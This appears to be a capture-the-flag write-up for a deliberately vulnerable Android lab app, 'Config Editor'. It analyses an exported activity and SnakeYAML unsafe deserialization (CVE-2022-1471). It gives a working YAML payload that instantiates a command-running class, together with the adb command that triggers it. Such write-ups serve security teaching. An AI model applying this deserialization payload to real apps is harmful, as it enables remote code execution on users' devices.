Config Editor

  1. install the app and open it i found that app has an input field to write on it and the save it as yaml file ,, the sec feature is load file from the storage

    image.png

  2. Let’s Exam the Androidmanifest.xml :

  3. here we have a MainActivity : it’s an exported activity : with an intent filter with a View action and have 3 schemas : file , http , https & with a category : Browsable & allowing users to load and save YAML files.

  4. after some analysis of Main Activity i found an interested Functions :

    1. loadYaml() : it used to open the file with the given URI and then Read the file as an input stream , then parse the YAML content file into an object

    2. saveYaml() : take the input we put and then Convert to Bytes: It converts the text content into a byte and writes it to a YAML file at the specified URI.

    3. intent Handling() : handle Intent processes intents that contain a URI to load a file, which it passes to load Yaml if valid.

  5. after i have search about SnakeYAML library , it has a CVE-2022-1471

    1. its a deserialization vulnerability, with versions before 2.0 allowing remote code execution when used to parse untrusted input

    2. SnakeYAML allows the instantiation of arbitrary Java classes from untrusted YAML sources. This "insecure by default”

  6. We have a class name called LegacyCommandUtil this class provides a way to run arbitrary shell commands from within an Android app or Java program

  7. we can exploit this vulnerability to pass a malicious argument to LegacyCommandUtil and achieve RCE

  8. Exploitation Strategy :

    1. Craft a Malicious YAML File: that, when opened by this app, could trigger remote code execution (RCE). create an exploit.yml file that contain this payload

      1. RCE by kero: !!com.mobilehackinglab.configeditor.LegacyCommandUtil ["touch /data/data/com.mobilehackinglab.configeditor/kero.txt"]

      2. push this yaml file to the external storage

    2. then used the below adb command to load the yml file from the external storage (/sdcard/Download)

    3. adb shell am start -n com.mobilehackinglab.configeditor/.MainActivity -a android.intent.action.VIEW -d "file:///sdcard/Download/exploit.yml"

    4. and here we done

PreviousDocument ViewerNextWeb Vulnerabilities

Last updated